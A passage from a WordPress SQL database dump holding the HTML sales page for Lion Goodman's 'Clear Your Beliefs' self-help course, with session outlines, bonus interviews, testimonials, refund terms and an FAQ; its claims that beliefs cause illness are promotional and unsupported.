create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to font color="blue" &gt;<a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, BeliefCloset.com, or ConfusedAboutLove.com.</p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n//', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-14 13:50:43', '2014-12-14 18:50:43', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2042, 2, '2014-12-14 13:57:37', '2014-12-14 18:57:37', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n\n<strong>It''s that simple.</strong></p>\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception 